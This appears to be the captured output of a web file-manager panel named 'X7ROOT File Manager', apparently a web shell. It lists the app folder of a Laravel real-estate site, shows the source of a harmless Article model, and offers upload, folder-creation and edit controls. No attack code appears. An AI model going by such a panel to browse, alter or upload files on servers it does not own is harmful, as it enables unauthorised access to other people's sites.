X7ROOT File Manager
Current Path:
/home/gfecatvj/sites/realesbar-X/app
home
/
gfecatvj
/
sites
/
realesbar-X
/
app
/
📁
..
📄
Agency.php
(102 B)
📄
Agent.php
(101 B)
📄
Article.php
(306 B)
📄
Blogger.php
(103 B)
📁
Console
📁
Exceptions
📄
Feedback.php
(104 B)
📁
Http
📁
Mail
📄
Message.php
(103 B)
📄
Pcomment.php
(104 B)
📄
Property.php
(2.09 KB)
📁
Providers
📄
Role.php
(221 B)
📄
User.php
(1.02 KB)
Editing: Article.php
<?php namespace App; use Illuminate\Database\Eloquent\Model; class Article extends Model { public function features() { return $this->belongsToMany(Feature::class)->withTimestamps(); } public function user() { return $this->belongsTo(User::class,'user_id'); } }
Upload File
Create Folder